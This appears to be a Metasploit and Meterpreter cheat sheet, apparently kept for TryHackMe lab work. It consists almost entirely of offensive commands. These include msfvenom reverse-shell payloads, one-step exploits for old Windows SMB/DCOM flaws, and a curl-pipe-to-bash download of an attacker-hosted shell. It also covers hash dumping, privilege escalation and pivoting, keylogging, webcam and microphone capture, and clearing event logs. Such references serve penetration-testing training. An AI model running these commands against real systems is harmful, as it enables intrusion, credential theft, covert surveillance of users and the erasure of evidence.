Metasploit
Set the payload:
set payload <path>
Set the exploit:
use exploit/<path>
Quick Commands
ctrl + z
: Background a sessionsetg <name> <value>
: Set global valuesessions -l
: See background sessionssessions -i <session num>
: Go back into backgrounded sessionsoptions
: Show parametershashdump
: Dump hashesunset payload
: Clear payloadpost/windows/gather/hashdump
: Windows hashdump altipconfig
: Grab interface inforun autoroute -s <interfaceIP>/<Cidr Mask>
: Network pivot
PHP web Meterpreter shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
HTA RSH
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f hta-psh -o thm.hta
# OR you can do it through Metasploit
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
Easy WinXP pwn
IN the metasploit console:
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/bind_tcp
set RHOST <xp machine IP>
exploit
Easy Win2000 pwn
IN the metasploit console:
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost <Target IP>
set lhost <attacker IP>
set lport <attacker port>
exploit
Auxiliary Port Scan
# In the meterpreter shell of the infected machine
run autoroute -s <interfaceIP>/<Cidr Mask>
# Ctrl+Z to background she shell
auxiliary/scanner/portscan/tcp
set RHOSTS <pivot IP>/<Cidr Mask>
set ports <port 1>,<port 2>,<port n>
set threads 50
run
Privilege Escalation
To elevate your privilege you can use the commands:
use priv
getsystem
# OR
use exploit/windows/local/<technique>
# SET YOUR OPTIONS
exploit
Screen Capture:
# Elevate privlages
getsystem
# Load Library
use espia
# Migrate to Explorer.exe
ps
migrate <pid of explorer.exe>
# Grabb Screenshot
screengrab
Linux Elevate Your Shell:
Generate your payloads:
msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin
Start listener and server:
python3 -m http.server
nc -nlvp 1234
Use your unstable shell to download the stable shell bin:
curl <ip>:8000/shell.sh | bash
Start your meterpreter listener:
set payload linux/x86/meterpreter/reverse_tcp
use exploit/multi/handler
exploit
Download your meterpreter payload and run it:
curl -o /tmp/shell.bin <ip>:8000/shell.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin
Elevate the shell's permissions:
^Z
use post/multi/recon/local_exploit_suggester
exploit
Using the MFSDB and workspaces:
systemctl start postgresql
msfdb init
msfconsole
db_status
workspace
: View workspaceworkspace -a <workspace name>
: Add a workspaceworkspace -d <workspace name>
: Delete a workspaceworkspace <workspace name>
: Change current workspaceworkspace -h
: Show workspace optionshelp
: Show database commandsdb_nmap <params> <ip>
: Save nmap scan to dbhosts
: Get host informationservices
: Get service informationhosts -R
: Add hosts to RHOST paramservices -S <service name>
: Search for service in all hosts
Amazing THM Quick Reference command list:
Core commands
background
: Backgrounds the current sessionexit
: Terminate the Meterpreter sessionguid
: Get the session GUID (Globally Unique Identifier)help
: Displays the help menuinfo
: Displays information about a Post moduleirb
: Opens an interactive Ruby shell on the current sessionload
: Loads one or more Meterpreter extensionsmigrate
: Allows you to migrate Meterpreter to another processrun
: Executes a Meterpreter script or Post modulesessions
: Quickly switch to another session
File system commands
cd
: Will change directoryls
: Will list files in the current directory (dir will also work)pwd
: Prints the current working directoryedit
: will allow you to edit a filecat
: Will show the contents of a file to the screenrm
: Will delete the specified filesearch
: Will search for filesupload
: Will upload a file or directorydownload
: Will download a file or directory
Networking commands
arp
: Displays the host ARP (Address Resolution Protocol) cacheifconfig
: Displays network interfaces available on the target systemnetstat
: Displays the network connectionsportfwd
: Forwards a local port to a remote serviceroute
: Allows you to view and modify the routing table
System commands
clearev
: Clears the event logsexecute
: Executes a commandgetpid
: Shows the current process identifiergetuid
: Shows the user that Meterpreter is running askill
: Terminates a processpkill
: Terminates processes by nameps
: Lists running processesreboot
: Reboots the remote computershell
: Drops into a system command shellshutdown
: Shuts down the remote computersysinfo
: Gets information about the remote system, such as OS
Others Commands (these will be listed under different menu categories in the help menu)
idletime
: Returns the number of seconds the remote user has been idlekeyscan_dump
: Dumps the keystroke bufferkeyscan_start
: Starts capturing keystrokeskeyscan_stop
: Stops capturing keystrokesscreenshare
: Allows you to watch the remote user's desktop in real timescreenshot
: Grabs a screenshot of the interactive desktoprecord_mic
: Records audio from the default microphone for X secondswebcam_chat
: Starts a video chatwebcam_list
: Lists webcamswebcam_snap
: Takes a snapshot from the specified webcamwebcam_stream
: Plays a video stream from the specified webcamgetsystem
: Attempts to elevate your privilege to that of local systemhashdump
: Dumps the contents of the SAM database
Last updated